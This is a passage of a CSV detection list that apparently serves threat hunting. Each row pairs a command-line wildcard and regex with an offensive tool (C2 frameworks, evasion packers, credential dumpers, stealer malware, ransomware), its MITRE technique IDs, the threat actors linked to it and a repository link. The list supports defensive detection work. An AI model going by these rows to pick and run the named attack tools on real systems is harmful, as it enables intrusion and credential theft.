It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","1176" "* -f shells/generic1.ps1 *",".{0,1000}\s\-f\sshells\/generic1\.ps1\s.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","1177" "* -f tcpview.exe -s iat_reverse_tcp_inline -H * -P * -m automatic -C*",".{0,1000}\s\-f\stcpview\.exe\s\-s\siat_reverse_tcp_inline\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-m\sautomatic\s\-C.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","1178" "* -f TeamViewer.exe -H * -P * -s *",".{0,1000}\s\-f\sTeamViewer\.exe\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-s\s.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","1179" "* fake small keys before real 
ones""*",".{0,1000}\sfake\ssmall\skeys\sbefore\sreal\sones\"".{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","1180" "* --fakealias www.fake.com*",".{0,1000}\s\-\-fakealias\swww\.fake\.com.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","1181" "* -FakeCmdLine *",".{0,1000}\s\-FakeCmdLine\s.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","1182" "* -FakeCmdLine *",".{0,1000}\s\-FakeCmdLine\s.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","1183" "* -FakeDC * -SamAccountName * -Username *",".{0,1000}\s\-FakeDC\s.{0,1000}\s\-SamAccountName\s.{0,1000}\s\-Username\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. 
If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1184" "* --fakedomains *",".{0,1000}\s\-\-fakedomains\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","1185" "* -fake-hostname *",".{0,1000}\s\-fake\-hostname\s.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","1186" "* --fakeip *",".{0,1000}\s\-\-fakeip\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","1187" "* --fakeipv6 *",".{0,1000}\s\-\-fakeipv6\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","1188" "* --fakemail *",".{0,1000}\s\-\-fakemail\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","1189" "* fcrdns.nse*",".{0,1000}\sfcrdns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1190" "* fenty.py*",".{0,1000}\sfenty\.py.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","1191" "* --file ownedusers.txt*",".{0,1000}\s\-\-file\sownedusers\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1192" "* file://catspin.yaml *",".{0,1000}\sfile\:\/\/catspin\.yaml\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. 
It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","1193" "* --file-smuggler-port *",".{0,1000}\s\-\-file\-smuggler\-port\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","1194" "* filetransfer -download -src-file *.exe*/tmp*",".{0,1000}\sfiletransfer\s\-download\s\-src\-file\s.{0,1000}\.exe.{0,1000}\/tmp.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","1195" "* filetransfer -upload -src-file *.exe*\temp*",".{0,1000}\sfiletransfer\s\-upload\s\-src\-file\s.{0,1000}\.exe.{0,1000}\\temp.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - 
Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","1196" "* FileZillaPwd*",".{0,1000}\sFileZillaPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1197" "* finger.nse*",".{0,1000}\sfinger\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1198" "* fingerprint-strings.nse*",".{0,1000}\sfingerprint\-strings\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1199" "* firewalk.nse*",".{0,1000}\sfirewalk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1200" "* firewall-bypass.nse*",".{0,1000}\sfirewall\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1201" "* flash.bat*",".{0,1000}\sflash\.bat.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tool","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","1202" "* -fluctuate=NA -sleep=*",".{0,1000}\s\-fluctuate\=NA\s\-sleep\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth 
- menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1203" "* -fluctuate=RW -sleep=*",".{0,1000}\s\-fluctuate\=RW\s\-sleep\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1204" "* flume-master-info.nse*",".{0,1000}\sflume\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1205" "* --flush-attacks*",".{0,1000}\s\-\-flush\-attacks.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","1206" "* follina.py *",".{0,1000}\sfollina\.py\s.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z","1207" "* follow_attacker_commands.py*",".{0,1000}\sfollow_attacker_commands\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","1208" "* -force-forwardable",".{0,1000}\s\-force\-forwardable","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1209" "* --force-kerb *",".{0,1000}\s\-\-force\-kerb\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","1210" "* --force-ps32",".{0,1000}\s\-\-force\-ps32","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1211" "* -forceshadowcred *",".{0,1000}\s\-forceshadowcred\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but with RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","1212" "* --ForceShadowCred*",".{0,1000}\s\-\-ForceShadowCred.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","1213" "* Forensia.exe*",".{0,1000}\sForensia\.exe.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","1214" "* 
Forensike.ps1*",".{0,1000}\sForensike\.ps1.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","1215" "* forgeTGT(*",".{0,1000}\sforgeTGT\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
